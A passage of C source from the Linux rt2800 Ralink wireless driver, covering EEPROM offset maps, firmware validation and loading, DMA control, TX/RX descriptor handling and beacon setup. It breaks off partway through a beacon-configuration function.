	[EEPROM_RSSI_A]			= 0x0025,
	[EEPROM_RSSI_A2]		= 0x0026,
	[EEPROM_TXMIXER_GAIN_A]		= 0x0026, /* overlaps with RSSI_A2 */
	[EEPROM_EIRP_MAX_TX_POWER]	= 0x0027,
	[EEPROM_TXPOWER_DELTA]		= 0x0028,
	[EEPROM_TXPOWER_BG1]		= 0x0029,
	[EEPROM_TXPOWER_BG2]		= 0x0030,
	[EEPROM_TSSI_BOUND_BG1]		= 0x0037,
	[EEPROM_TSSI_BOUND_BG2]		= 0x0038,
	[EEPROM_TSSI_BOUND_BG3]		= 0x0039,
	[EEPROM_TSSI_BOUND_BG4]		= 0x003a,
	[EEPROM_TSSI_BOUND_BG5]		= 0x003b,
	[EEPROM_TXPOWER_A1]		= 0x003c,
	[EEPROM_TXPOWER_A2]		= 0x0053,
	[EEPROM_TSSI_BOUND_A1]		= 0x006a,
	[EEPROM_TSSI_BOUND_A2]		= 0x006b,
	[EEPROM_TSSI_BOUND_A3]		= 0x006c,
	[EEPROM_TSSI_BOUND_A4]		= 0x006d,
	[EEPROM_TSSI_BOUND_A5]		= 0x006e,
	[EEPROM_TXPOWER_BYRATE]		= 0x006f,
	[EEPROM_BBP_START]		= 0x0078,
};
/*
 * EEPROM word offsets for the extended EEPROM layout, selected for RT3593
 * devices by rt2800_eeprom_word_index(). Same indexing conventions as
 * rt2800_eeprom_map above.
 */
static const unsigned int rt2800_eeprom_map_ext[EEPROM_WORD_COUNT] = {
	[EEPROM_CHIP_ID]		= 0x0000,
	[EEPROM_VERSION]		= 0x0001,
	[EEPROM_MAC_ADDR_0]		= 0x0002,
	[EEPROM_MAC_ADDR_1]		= 0x0003,
	[EEPROM_MAC_ADDR_2]		= 0x0004,
	[EEPROM_NIC_CONF0]		= 0x001a,
	[EEPROM_NIC_CONF1]		= 0x001b,
	[EEPROM_NIC_CONF2]		= 0x001c,
	[EEPROM_EIRP_MAX_TX_POWER]	= 0x0020,
	[EEPROM_FREQ]			= 0x0022,
	[EEPROM_LED_AG_CONF]		= 0x0023,
	[EEPROM_LED_ACT_CONF]		= 0x0024,
	[EEPROM_LED_POLARITY]		= 0x0025,
	[EEPROM_LNA]			= 0x0026,
	[EEPROM_EXT_LNA2]		= 0x0027,
	[EEPROM_RSSI_BG]		= 0x0028,
	[EEPROM_RSSI_BG2]		= 0x0029,
	[EEPROM_RSSI_A]			= 0x002a,
	[EEPROM_RSSI_A2]		= 0x002b,
	[EEPROM_TXPOWER_BG1]		= 0x0030,
	[EEPROM_TXPOWER_BG2]		= 0x0037,
	[EEPROM_EXT_TXPOWER_BG3]	= 0x003e,
	[EEPROM_TSSI_BOUND_BG1]		= 0x0045,
	[EEPROM_TSSI_BOUND_BG2]		= 0x0046,
	[EEPROM_TSSI_BOUND_BG3]		= 0x0047,
	[EEPROM_TSSI_BOUND_BG4]		= 0x0048,
	[EEPROM_TSSI_BOUND_BG5]		= 0x0049,
	[EEPROM_TXPOWER_A1]		= 0x004b,
	[EEPROM_TXPOWER_A2]		= 0x0065,
	[EEPROM_EXT_TXPOWER_A3]		= 0x007f,
	[EEPROM_TSSI_BOUND_A1]		= 0x009a,
	[EEPROM_TSSI_BOUND_A2]		= 0x009b,
	[EEPROM_TSSI_BOUND_A3]		= 0x009c,
	[EEPROM_TSSI_BOUND_A4]		= 0x009d,
	[EEPROM_TSSI_BOUND_A5]		= 0x009e,
	[EEPROM_TXPOWER_BYRATE]		= 0x00a0,
};
/*
 * Translate a logical EEPROM word into the physical offset for the
 * chipset's EEPROM layout. Warns (once) and returns 0 on out-of-range
 * words or on accesses to fields that the layout does not provide.
 */
static unsigned int rt2800_eeprom_word_index(struct rt2x00_dev *rt2x00dev,
					     const enum rt2800_eeprom_word word)
{
	const unsigned int *map;
	unsigned int index;

	if (WARN_ONCE(word >= EEPROM_WORD_COUNT,
		      "%s: invalid EEPROM word %d\n",
		      wiphy_name(rt2x00dev->hw->wiphy), word))
		return 0;

	/* RT3593 uses the extended EEPROM layout. */
	map = rt2x00_rt(rt2x00dev, RT3593) ? rt2800_eeprom_map_ext
					   : rt2800_eeprom_map;

	index = map[word];

	/* Index 0 is valid only for EEPROM_CHIP_ID.
	 * Otherwise it means that the offset of the
	 * given word is not initialized in the map,
	 * or that the field is not usable on the
	 * actual chipset.
	 */
	WARN_ONCE(word != EEPROM_CHIP_ID && index == 0,
		  "%s: invalid access of EEPROM word %d\n",
		  wiphy_name(rt2x00dev->hw->wiphy), word);

	return index;
}
/* Return a pointer into the EEPROM cache for the given logical word. */
static void *rt2800_eeprom_addr(struct rt2x00_dev *rt2x00dev,
				const enum rt2800_eeprom_word word)
{
	return rt2x00_eeprom_addr(rt2x00dev,
				  rt2800_eeprom_word_index(rt2x00dev, word));
}
/* Read the EEPROM word identified by the logical index @word into *@data. */
static void rt2800_eeprom_read(struct rt2x00_dev *rt2x00dev,
			       const enum rt2800_eeprom_word word, u16 *data)
{
	unsigned int offset = rt2800_eeprom_word_index(rt2x00dev, word);

	rt2x00_eeprom_read(rt2x00dev, offset, data);
}
/* Write @data into the EEPROM word identified by the logical index @word. */
static void rt2800_eeprom_write(struct rt2x00_dev *rt2x00dev,
				const enum rt2800_eeprom_word word, u16 data)
{
	unsigned int offset = rt2800_eeprom_word_index(rt2x00dev, word);

	rt2x00_eeprom_write(rt2x00dev, offset, data);
}
/*
 * Read element @offset of the EEPROM array starting at the logical
 * word @array into *@data.
 */
static void rt2800_eeprom_read_from_array(struct rt2x00_dev *rt2x00dev,
					  const enum rt2800_eeprom_word array,
					  unsigned int offset,
					  u16 *data)
{
	unsigned int base = rt2800_eeprom_word_index(rt2x00dev, array);

	rt2x00_eeprom_read(rt2x00dev, base + offset, data);
}
/*
 * Power up the WLAN function of the RT3290 combo chip. Retries the
 * PLL/XTAL bring-up sequence up to 10 times before giving up with -EIO.
 * Returns 0 when WLAN is (already) enabled.
 *
 * Fix: restore "&reg" which had been corrupted to the mojibake "®"
 * character, breaking compilation.
 */
static int rt2800_enable_wlan_rt3290(struct rt2x00_dev *rt2x00dev)
{
	u32 reg;
	int i, count;

	rt2800_register_read(rt2x00dev, WLAN_FUN_CTRL, &reg);
	if (rt2x00_get_field32(reg, WLAN_EN))
		return 0;

	rt2x00_set_field32(&reg, WLAN_GPIO_OUT_OE_BIT_ALL, 0xff);
	rt2x00_set_field32(&reg, FRC_WL_ANT_SET, 1);
	rt2x00_set_field32(&reg, WLAN_CLK_EN, 0);
	rt2x00_set_field32(&reg, WLAN_EN, 1);
	rt2800_register_write(rt2x00dev, WLAN_FUN_CTRL, reg);

	udelay(REGISTER_BUSY_DELAY);

	count = 0;
	do {
		/*
		 * Check PLL_LD & XTAL_RDY.
		 */
		for (i = 0; i < REGISTER_BUSY_COUNT; i++) {
			rt2800_register_read(rt2x00dev, CMB_CTRL, &reg);
			if (rt2x00_get_field32(reg, PLL_LD) &&
			    rt2x00_get_field32(reg, XTAL_RDY))
				break;
			udelay(REGISTER_BUSY_DELAY);
		}

		if (i >= REGISTER_BUSY_COUNT) {
			if (count >= 10)
				return -EIO;

			/* Kick the PLL via register 0x58, then retry. */
			rt2800_register_write(rt2x00dev, 0x58, 0x018);
			udelay(REGISTER_BUSY_DELAY);
			rt2800_register_write(rt2x00dev, 0x58, 0x418);
			udelay(REGISTER_BUSY_DELAY);
			rt2800_register_write(rt2x00dev, 0x58, 0x618);
			udelay(REGISTER_BUSY_DELAY);
			count++;
		} else {
			count = 0;
		}

		/* Enable the WLAN clock and pulse the reset bit. */
		rt2800_register_read(rt2x00dev, WLAN_FUN_CTRL, &reg);
		rt2x00_set_field32(&reg, PCIE_APP0_CLK_REQ, 0);
		rt2x00_set_field32(&reg, WLAN_CLK_EN, 1);
		rt2x00_set_field32(&reg, WLAN_RESET, 1);
		rt2800_register_write(rt2x00dev, WLAN_FUN_CTRL, reg);
		udelay(10);

		rt2x00_set_field32(&reg, WLAN_RESET, 0);
		rt2800_register_write(rt2x00dev, WLAN_FUN_CTRL, reg);
		udelay(10);

		rt2800_register_write(rt2x00dev, INT_SOURCE_CSR, 0x7fffffff);
	} while (count != 0);

	return 0;
}
/*
 * Send a command to the on-chip MCU via the H2M mailbox. No-op on SoC
 * devices, which have no MCU. If the mailbox never becomes free the
 * request is silently dropped.
 *
 * Fix: restore "&reg" which had been corrupted to the mojibake "®"
 * character, breaking compilation.
 */
void rt2800_mcu_request(struct rt2x00_dev *rt2x00dev,
			const u8 command, const u8 token,
			const u8 arg0, const u8 arg1)
{
	u32 reg;

	/*
	 * SOC devices don't support MCU requests.
	 */
	if (rt2x00_is_soc(rt2x00dev))
		return;

	mutex_lock(&rt2x00dev->csr_mutex);

	/*
	 * Wait until the MCU becomes available, afterwards we
	 * can safely write the new data into the register.
	 */
	if (WAIT_FOR_MCU(rt2x00dev, &reg)) {
		rt2x00_set_field32(&reg, H2M_MAILBOX_CSR_OWNER, 1);
		rt2x00_set_field32(&reg, H2M_MAILBOX_CSR_CMD_TOKEN, token);
		rt2x00_set_field32(&reg, H2M_MAILBOX_CSR_ARG0, arg0);
		rt2x00_set_field32(&reg, H2M_MAILBOX_CSR_ARG1, arg1);
		rt2800_register_write_lock(rt2x00dev, H2M_MAILBOX_CSR, reg);

		reg = 0;
		rt2x00_set_field32(&reg, HOST_CMD_CSR_HOST_COMMAND, command);
		rt2800_register_write_lock(rt2x00dev, HOST_CMD_CSR, reg);
	}

	mutex_unlock(&rt2x00dev->csr_mutex);
}
EXPORT_SYMBOL_GPL(rt2800_mcu_request);
/*
 * Poll MAC_CSR0 until the hardware responds with a plausible value
 * (neither all-zeroes nor all-ones). Returns 0 on success, -EBUSY if the
 * hardware stays unresponsive for REGISTER_BUSY_COUNT iterations.
 *
 * Fix: restore "&reg" which had been corrupted to the mojibake "®"
 * character, breaking compilation.
 */
int rt2800_wait_csr_ready(struct rt2x00_dev *rt2x00dev)
{
	unsigned int i = 0;
	u32 reg;

	for (i = 0; i < REGISTER_BUSY_COUNT; i++) {
		rt2800_register_read(rt2x00dev, MAC_CSR0, &reg);
		if (reg && reg != ~0)
			return 0;
		msleep(1);
	}

	rt2x00_err(rt2x00dev, "Unstable hardware\n");
	return -EBUSY;
}
EXPORT_SYMBOL_GPL(rt2800_wait_csr_ready);
/*
 * Wait for both the TX and RX DMA engines to become idle. Returns 0 when
 * idle, -EACCES when they remain busy after the polling loop times out.
 *
 * Fix: restore "&reg" which had been corrupted to the mojibake "®"
 * character, breaking compilation.
 */
int rt2800_wait_wpdma_ready(struct rt2x00_dev *rt2x00dev)
{
	unsigned int i;
	u32 reg;

	/*
	 * Some devices are really slow to respond here. Wait a whole second
	 * before timing out.
	 */
	for (i = 0; i < REGISTER_BUSY_COUNT; i++) {
		rt2800_register_read(rt2x00dev, WPDMA_GLO_CFG, &reg);
		if (!rt2x00_get_field32(reg, WPDMA_GLO_CFG_TX_DMA_BUSY) &&
		    !rt2x00_get_field32(reg, WPDMA_GLO_CFG_RX_DMA_BUSY))
			return 0;
		msleep(10);
	}

	rt2x00_err(rt2x00dev, "WPDMA TX/RX busy [0x%08x]\n", reg);
	return -EACCES;
}
EXPORT_SYMBOL_GPL(rt2800_wait_wpdma_ready);
/*
 * Disable the TX and RX DMA engines and clear their busy bits in
 * WPDMA_GLO_CFG.
 *
 * Fix: restore "&reg" which had been corrupted to the mojibake "®"
 * character, breaking compilation.
 */
void rt2800_disable_wpdma(struct rt2x00_dev *rt2x00dev)
{
	u32 reg;

	rt2800_register_read(rt2x00dev, WPDMA_GLO_CFG, &reg);
	rt2x00_set_field32(&reg, WPDMA_GLO_CFG_ENABLE_TX_DMA, 0);
	rt2x00_set_field32(&reg, WPDMA_GLO_CFG_TX_DMA_BUSY, 0);
	rt2x00_set_field32(&reg, WPDMA_GLO_CFG_ENABLE_RX_DMA, 0);
	rt2x00_set_field32(&reg, WPDMA_GLO_CFG_RX_DMA_BUSY, 0);
	rt2x00_set_field32(&reg, WPDMA_GLO_CFG_TX_WRITEBACK_DONE, 1);
	rt2800_register_write(rt2x00dev, WPDMA_GLO_CFG, reg);
}
EXPORT_SYMBOL_GPL(rt2800_disable_wpdma);
/*
 * Report the TXWI/RXWI descriptor sizes for the detected RT chipset.
 * RT3593 and RT5592 use larger descriptors than the common 4-word layout.
 */
void rt2800_get_txwi_rxwi_size(struct rt2x00_dev *rt2x00dev,
			       unsigned short *txwi_size,
			       unsigned short *rxwi_size)
{
	if (rt2x00dev->chip.rt == RT3593) {
		*txwi_size = TXWI_DESC_SIZE_4WORDS;
		*rxwi_size = RXWI_DESC_SIZE_5WORDS;
	} else if (rt2x00dev->chip.rt == RT5592) {
		*txwi_size = TXWI_DESC_SIZE_5WORDS;
		*rxwi_size = RXWI_DESC_SIZE_6WORDS;
	} else {
		/* Common layout for all other chipsets. */
		*txwi_size = TXWI_DESC_SIZE_4WORDS;
		*rxwi_size = RXWI_DESC_SIZE_4WORDS;
	}
}
EXPORT_SYMBOL_GPL(rt2800_get_txwi_rxwi_size);
/*
 * Verify the CRC of a firmware image: the last two bytes of @data hold
 * the expected big-endian checksum over the preceding bytes.
 */
static bool rt2800_check_firmware_crc(const u8 *data, const size_t len)
{
	u16 fw_crc;
	u16 crc;

	/*
	 * The last 2 bytes in the firmware array are the crc checksum itself,
	 * this means that we should never pass those 2 bytes to the crc
	 * algorithm.
	 */
	fw_crc = (data[len - 2] << 8 | data[len - 1]);

	/*
	 * Use the crc ccitt algorithm.
	 * This will return the same value as the legacy driver which
	 * used bit ordering reversion on both the firmware bytes
	 * before input as well as on the final output.
	 * Obviously using crc ccitt directly is much more efficient.
	 */
	crc = crc_ccitt(~0, data, len - 2);

	/*
	 * There is a small difference between the crc-itu-t + bitrev and
	 * the crc-ccitt crc calculation. In the latter method the 2 bytes
	 * will be swapped, use swab16 to convert the crc to the correct
	 * value.
	 */
	crc = swab16(crc);

	return fw_crc == crc;
}
/*
 * Validate a firmware image before upload: check its length against the
 * interface type, reject known-incompatible single-part images for some
 * USB chipsets, and CRC-check every fw_len-sized part.
 * Returns FW_OK, FW_BAD_LENGTH, FW_BAD_VERSION or FW_BAD_CRC.
 */
int rt2800_check_firmware(struct rt2x00_dev *rt2x00dev,
			  const u8 *data, const size_t len)
{
	size_t offset = 0;
	size_t fw_len;
	bool multiple;

	/*
	 * PCI(e) & SOC devices require firmware with a length
	 * of 8kb. USB devices require firmware files with a length
	 * of 4kb. Certain USB chipsets however require different firmware,
	 * which Ralink only provides attached to the original firmware
	 * file. Thus for USB devices, firmware files have a length
	 * which is a multiple of 4kb. The firmware for rt3290 chip also
	 * have a length which is a multiple of 4kb.
	 */
	if (rt2x00_is_usb(rt2x00dev) || rt2x00_rt(rt2x00dev, RT3290))
		fw_len = 4096;
	else
		fw_len = 8192;

	multiple = true;

	/*
	 * Validate the firmware length
	 */
	if (len != fw_len && (!multiple || (len % fw_len) != 0))
		return FW_BAD_LENGTH;

	/*
	 * Check if the chipset requires one of the upper parts
	 * of the firmware.
	 */
	if (rt2x00_is_usb(rt2x00dev) &&
	    !rt2x00_rt(rt2x00dev, RT2860) &&
	    !rt2x00_rt(rt2x00dev, RT2872) &&
	    !rt2x00_rt(rt2x00dev, RT3070) &&
	    ((len / fw_len) == 1))
		return FW_BAD_VERSION;

	/*
	 * 8kb firmware files must be checked as if it were
	 * 2 separate firmware files.
	 */
	while (offset < len) {
		if (!rt2800_check_firmware_crc(data + offset, fw_len))
			return FW_BAD_CRC;
		offset += fw_len;
	}

	return FW_OK;
}
EXPORT_SYMBOL_GPL(rt2800_check_firmware);
/*
 * Upload @data (a pre-validated firmware image) to the device and wait
 * until the on-chip systems report ready. Returns 0 on success or -EBUSY
 * when the hardware does not stabilize.
 *
 * Fix: restore "&reg" which had been corrupted to the mojibake "®"
 * character, breaking compilation.
 */
int rt2800_load_firmware(struct rt2x00_dev *rt2x00dev,
			 const u8 *data, const size_t len)
{
	unsigned int i;
	u32 reg;
	int retval;

	if (rt2x00_rt(rt2x00dev, RT3290)) {
		retval = rt2800_enable_wlan_rt3290(rt2x00dev);
		if (retval)
			return -EBUSY;
	}

	/*
	 * If driver doesn't wake up firmware here,
	 * rt2800_load_firmware will hang forever when interface is up again.
	 */
	rt2800_register_write(rt2x00dev, AUTOWAKEUP_CFG, 0x00000000);

	/*
	 * Wait for stable hardware.
	 */
	if (rt2800_wait_csr_ready(rt2x00dev))
		return -EBUSY;

	if (rt2x00_is_pci(rt2x00dev)) {
		if (rt2x00_rt(rt2x00dev, RT3290) ||
		    rt2x00_rt(rt2x00dev, RT3572) ||
		    rt2x00_rt(rt2x00dev, RT5390) ||
		    rt2x00_rt(rt2x00dev, RT5392)) {
			rt2800_register_read(rt2x00dev, AUX_CTRL, &reg);
			rt2x00_set_field32(&reg, AUX_CTRL_FORCE_PCIE_CLK, 1);
			rt2x00_set_field32(&reg, AUX_CTRL_WAKE_PCIE_EN, 1);
			rt2800_register_write(rt2x00dev, AUX_CTRL, reg);
		}
		rt2800_register_write(rt2x00dev, PWR_PIN_CFG, 0x00000002);
	}

	rt2800_disable_wpdma(rt2x00dev);

	/*
	 * Write firmware to the device.
	 */
	rt2800_drv_write_firmware(rt2x00dev, data, len);

	/*
	 * Wait for device to stabilize.
	 */
	for (i = 0; i < REGISTER_BUSY_COUNT; i++) {
		rt2800_register_read(rt2x00dev, PBF_SYS_CTRL, &reg);
		if (rt2x00_get_field32(reg, PBF_SYS_CTRL_READY))
			break;
		msleep(1);
	}

	if (i == REGISTER_BUSY_COUNT) {
		rt2x00_err(rt2x00dev, "PBF system register not ready\n");
		return -EBUSY;
	}

	/*
	 * Disable DMA, will be reenabled later when enabling
	 * the radio.
	 */
	rt2800_disable_wpdma(rt2x00dev);

	/*
	 * Initialize firmware.
	 */
	rt2800_register_write(rt2x00dev, H2M_BBP_AGENT, 0);
	rt2800_register_write(rt2x00dev, H2M_MAILBOX_CSR, 0);
	if (rt2x00_is_usb(rt2x00dev)) {
		rt2800_register_write(rt2x00dev, H2M_INT_SRC, 0);
		rt2800_mcu_request(rt2x00dev, MCU_BOOT_SIGNAL, 0, 0, 0);
	}
	msleep(1);

	return 0;
}
EXPORT_SYMBOL_GPL(rt2800_load_firmware);
/*
 * Fill the TXWI (TX wireless information) descriptor for @entry from the
 * generic @txdesc. Words 0 and 1 carry rate/flag information; all
 * remaining words are zeroed.
 */
void rt2800_write_tx_data(struct queue_entry *entry,
			  struct txentry_desc *txdesc)
{
	__le32 *txwi = rt2800_drv_get_txwi(entry);
	u32 word;
	int i;

	/*
	 * Initialize TX Info descriptor
	 */
	rt2x00_desc_read(txwi, 0, &word);
	rt2x00_set_field32(&word, TXWI_W0_FRAG,
			   test_bit(ENTRY_TXD_MORE_FRAG, &txdesc->flags));
	rt2x00_set_field32(&word, TXWI_W0_MIMO_PS,
			   test_bit(ENTRY_TXD_HT_MIMO_PS, &txdesc->flags));
	rt2x00_set_field32(&word, TXWI_W0_CF_ACK, 0);
	rt2x00_set_field32(&word, TXWI_W0_TS,
			   test_bit(ENTRY_TXD_REQ_TIMESTAMP, &txdesc->flags));
	rt2x00_set_field32(&word, TXWI_W0_AMPDU,
			   test_bit(ENTRY_TXD_HT_AMPDU, &txdesc->flags));
	rt2x00_set_field32(&word, TXWI_W0_MPDU_DENSITY,
			   txdesc->u.ht.mpdu_density);
	rt2x00_set_field32(&word, TXWI_W0_TX_OP, txdesc->u.ht.txop);
	rt2x00_set_field32(&word, TXWI_W0_MCS, txdesc->u.ht.mcs);
	rt2x00_set_field32(&word, TXWI_W0_BW,
			   test_bit(ENTRY_TXD_HT_BW_40, &txdesc->flags));
	rt2x00_set_field32(&word, TXWI_W0_SHORT_GI,
			   test_bit(ENTRY_TXD_HT_SHORT_GI, &txdesc->flags));
	rt2x00_set_field32(&word, TXWI_W0_STBC, txdesc->u.ht.stbc);
	rt2x00_set_field32(&word, TXWI_W0_PHYMODE, txdesc->rate_mode);
	rt2x00_desc_write(txwi, 0, word);

	rt2x00_desc_read(txwi, 1, &word);
	rt2x00_set_field32(&word, TXWI_W1_ACK,
			   test_bit(ENTRY_TXD_ACK, &txdesc->flags));
	rt2x00_set_field32(&word, TXWI_W1_NSEQ,
			   test_bit(ENTRY_TXD_GENERATE_SEQ, &txdesc->flags));
	rt2x00_set_field32(&word, TXWI_W1_BW_WIN_SIZE, txdesc->u.ht.ba_size);
	rt2x00_set_field32(&word, TXWI_W1_WIRELESS_CLI_ID,
			   test_bit(ENTRY_TXD_ENCRYPT, &txdesc->flags) ?
			   txdesc->key_idx : txdesc->u.ht.wcid);
	rt2x00_set_field32(&word, TXWI_W1_MPDU_TOTAL_BYTE_COUNT,
			   txdesc->length);
	/* Packet id encodes the queue and a per-entry tag (1..3). */
	rt2x00_set_field32(&word, TXWI_W1_PACKETID_QUEUE, entry->queue->qid);
	rt2x00_set_field32(&word, TXWI_W1_PACKETID_ENTRY, (entry->entry_idx % 3) + 1);
	rt2x00_desc_write(txwi, 1, word);

	/*
	 * Always write 0 to IV/EIV fields (word 2 and 3), hardware will insert
	 * the IV from the IVEIV register when TXD_W3_WIV is set to 0.
	 * When TXD_W3_WIV is set to 1 it will use the IV data
	 * from the descriptor. The TXWI_W1_WIRELESS_CLI_ID indicates which
	 * crypto entry in the registers should be used to encrypt the frame.
	 *
	 * Nullify all remaining words as well, we don't know how to program them.
	 */
	for (i = 2; i < entry->queue->winfo_size / sizeof(__le32); i++)
		_rt2x00_desc_write(txwi, i, 0);
}
EXPORT_SYMBOL_GPL(rt2800_write_tx_data);
/*
 * Convert the three per-chain AGC readings in RXWI word 2 into a single
 * RSSI value (dBm), using per-band calibration offsets from the EEPROM.
 */
static int rt2800_agc_to_rssi(struct rt2x00_dev *rt2x00dev, u32 rxwi_w2)
{
	s8 rssi0 = rt2x00_get_field32(rxwi_w2, RXWI_W2_RSSI0);
	s8 rssi1 = rt2x00_get_field32(rxwi_w2, RXWI_W2_RSSI1);
	s8 rssi2 = rt2x00_get_field32(rxwi_w2, RXWI_W2_RSSI2);
	u16 eeprom;
	u8 offset0;
	u8 offset1;
	u8 offset2;

	/* Pick the calibration offsets for the current band. */
	if (rt2x00dev->curr_band == IEEE80211_BAND_2GHZ) {
		rt2800_eeprom_read(rt2x00dev, EEPROM_RSSI_BG, &eeprom);
		offset0 = rt2x00_get_field16(eeprom, EEPROM_RSSI_BG_OFFSET0);
		offset1 = rt2x00_get_field16(eeprom, EEPROM_RSSI_BG_OFFSET1);
		rt2800_eeprom_read(rt2x00dev, EEPROM_RSSI_BG2, &eeprom);
		offset2 = rt2x00_get_field16(eeprom, EEPROM_RSSI_BG2_OFFSET2);
	} else {
		rt2800_eeprom_read(rt2x00dev, EEPROM_RSSI_A, &eeprom);
		offset0 = rt2x00_get_field16(eeprom, EEPROM_RSSI_A_OFFSET0);
		offset1 = rt2x00_get_field16(eeprom, EEPROM_RSSI_A_OFFSET1);
		rt2800_eeprom_read(rt2x00dev, EEPROM_RSSI_A2, &eeprom);
		offset2 = rt2x00_get_field16(eeprom, EEPROM_RSSI_A2_OFFSET2);
	}

	/*
	 * Convert the value from the descriptor into the RSSI value
	 * If the value in the descriptor is 0, it is considered invalid
	 * and the default (extremely low) rssi value is assumed
	 */
	rssi0 = (rssi0) ? (-12 - offset0 - rt2x00dev->lna_gain - rssi0) : -128;
	rssi1 = (rssi1) ? (-12 - offset1 - rt2x00dev->lna_gain - rssi1) : -128;
	rssi2 = (rssi2) ? (-12 - offset2 - rt2x00dev->lna_gain - rssi2) : -128;

	/*
	 * mac80211 only accepts a single RSSI value. Calculating the
	 * average doesn't deliver a fair answer either since -60:-60 would
	 * be considered equally good as -50:-70 while the second is the one
	 * which gives less energy...
	 */
	rssi0 = max(rssi0, rssi1);
	return (int)max(rssi0, rssi2);
}
/*
 * Parse the RXWI (RX wireless information) header at the start of the
 * received skb into @rxdesc, then strip the header from the buffer.
 */
void rt2800_process_rxwi(struct queue_entry *entry,
			 struct rxdone_entry_desc *rxdesc)
{
	__le32 *rxwi = (__le32 *) entry->skb->data;
	u32 word;

	rt2x00_desc_read(rxwi, 0, &word);

	rxdesc->cipher = rt2x00_get_field32(word, RXWI_W0_UDF);
	rxdesc->size = rt2x00_get_field32(word, RXWI_W0_MPDU_TOTAL_BYTE_COUNT);

	rt2x00_desc_read(rxwi, 1, &word);

	if (rt2x00_get_field32(word, RXWI_W1_SHORT_GI))
		rxdesc->flags |= RX_FLAG_SHORT_GI;

	if (rt2x00_get_field32(word, RXWI_W1_BW))
		rxdesc->flags |= RX_FLAG_40MHZ;

	/*
	 * Detect RX rate, always use MCS as signal type.
	 */
	rxdesc->dev_flags |= RXDONE_SIGNAL_MCS;
	rxdesc->signal = rt2x00_get_field32(word, RXWI_W1_MCS);
	rxdesc->rate_mode = rt2x00_get_field32(word, RXWI_W1_PHYMODE);

	/*
	 * Mask of 0x8 bit to remove the short preamble flag.
	 */
	if (rxdesc->rate_mode == RATE_MODE_CCK)
		rxdesc->signal &= ~0x8;

	rt2x00_desc_read(rxwi, 2, &word);

	/*
	 * Convert descriptor AGC value to RSSI value.
	 */
	rxdesc->rssi = rt2800_agc_to_rssi(entry->queue->rt2x00dev, word);

	/*
	 * Remove RXWI descriptor from start of the buffer.
	 */
	skb_pull(entry->skb, entry->queue->winfo_size);
}
EXPORT_SYMBOL_GPL(rt2800_process_rxwi);
/*
 * Complete a transmitted entry: derive success/failure, retry count and
 * aggregation info from the TX_STA_FIFO @status word and the entry's TXWI,
 * then hand the result to rt2x00lib_txdone().
 */
void rt2800_txdone_entry(struct queue_entry *entry, u32 status, __le32 *txwi)
{
	struct rt2x00_dev *rt2x00dev = entry->queue->rt2x00dev;
	struct skb_frame_desc *skbdesc = get_skb_frame_desc(entry->skb);
	struct txdone_entry_desc txdesc;
	u32 word;
	u16 mcs, real_mcs;
	int aggr, ampdu;

	/*
	 * Obtain the status about this packet.
	 */
	txdesc.flags = 0;
	rt2x00_desc_read(txwi, 0, &word);

	mcs = rt2x00_get_field32(word, TXWI_W0_MCS);
	ampdu = rt2x00_get_field32(word, TXWI_W0_AMPDU);

	real_mcs = rt2x00_get_field32(status, TX_STA_FIFO_MCS);
	aggr = rt2x00_get_field32(status, TX_STA_FIFO_TX_AGGRE);

	/*
	 * If a frame was meant to be sent as a single non-aggregated MPDU
	 * but ended up in an aggregate the used tx rate doesn't correlate
	 * with the one specified in the TXWI as the whole aggregate is sent
	 * with the same rate.
	 *
	 * For example: two frames are sent to rt2x00, the first one sets
	 * AMPDU=1 and requests MCS7 whereas the second frame sets AMDPU=0
	 * and requests MCS15. If the hw aggregates both frames into one
	 * AMDPU the tx status for both frames will contain MCS7 although
	 * the frame was sent successfully.
	 *
	 * Hence, replace the requested rate with the real tx rate to not
	 * confuse the rate control algorithm by providing clearly wrong
	 * data.
	 */
	if (unlikely(aggr == 1 && ampdu == 0 && real_mcs != mcs)) {
		skbdesc->tx_rate_idx = real_mcs;
		mcs = real_mcs;
	}

	if (aggr == 1 || ampdu == 1)
		__set_bit(TXDONE_AMPDU, &txdesc.flags);

	/*
	 * Ralink has a retry mechanism using a global fallback
	 * table. We setup this fallback table to try the immediate
	 * lower rate for all rates. In the TX_STA_FIFO, the MCS field
	 * always contains the MCS used for the last transmission, be
	 * it successful or not.
	 */
	if (rt2x00_get_field32(status, TX_STA_FIFO_TX_SUCCESS)) {
		/*
		 * Transmission succeeded. The number of retries is
		 * mcs - real_mcs
		 */
		__set_bit(TXDONE_SUCCESS, &txdesc.flags);
		txdesc.retry = ((mcs > real_mcs) ? mcs - real_mcs : 0);
	} else {
		/*
		 * Transmission failed. The number of retries is
		 * always 7 in this case (for a total number of 8
		 * frames sent).
		 */
		__set_bit(TXDONE_FAILURE, &txdesc.flags);
		txdesc.retry = rt2x00dev->long_retry;
	}

	/*
	 * the frame was retried at least once
	 * -> hw used fallback rates
	 */
	if (txdesc.retry)
		__set_bit(TXDONE_FALLBACK, &txdesc.flags);

	rt2x00lib_txdone(entry, &txdesc);
}
EXPORT_SYMBOL_GPL(rt2800_txdone_entry);
/* Return the hardware register base of beacon slot @index. */
static unsigned int rt2800_hw_beacon_base(struct rt2x00_dev *rt2x00dev,
					  unsigned int index)
{
	return HW_BEACON_BASE(index);
}

/* Return the BCN_OFFSET-style offset for beacon slot @index. */
static inline u8 rt2800_get_beacon_offset(struct rt2x00_dev *rt2x00dev,
					  unsigned int index)
{
	return BEACON_BASE_TO_OFFSET(rt2800_hw_beacon_base(rt2x00dev, index));
}
/*
 * Program the BCN_OFFSET0/1 registers with the offsets of all currently
 * enabled beacons and update MAC_BSSID_DW1 with the number of consecutive
 * beacons the hardware should send.
 */
static void rt2800_update_beacons_setup(struct rt2x00_dev *rt2x00dev)
{
	struct data_queue *queue = rt2x00dev->bcn;
	struct queue_entry *entry;
	int i, bcn_num = 0;
	u64 off, reg = 0;
	u32 bssid_dw1;

	/*
	 * Setup offsets of all active beacons in BCN_OFFSET{0,1} registers.
	 */
	for (i = 0; i < queue->limit; i++) {
		entry = &queue->entries[i];
		if (!test_bit(ENTRY_BCN_ENABLED, &entry->flags))
			continue;
		off = rt2800_get_beacon_offset(rt2x00dev, entry->entry_idx);
		/* One byte per beacon, packed into the 64-bit accumulator. */
		reg |= off << (8 * bcn_num);
		bcn_num++;
	}

	WARN_ON_ONCE(bcn_num != rt2x00dev->intf_beaconing);

	rt2800_register_write(rt2x00dev, BCN_OFFSET0, (u32) reg);
	rt2800_register_write(rt2x00dev, BCN_OFFSET1, (u32) (reg >> 32));

	/*
	 * H/W sends up to MAC_BSSID_DW1_BSS_BCN_NUM + 1 consecutive beacons.
	 */
	rt2800_register_read(rt2x00dev, MAC_BSSID_DW1, &bssid_dw1);
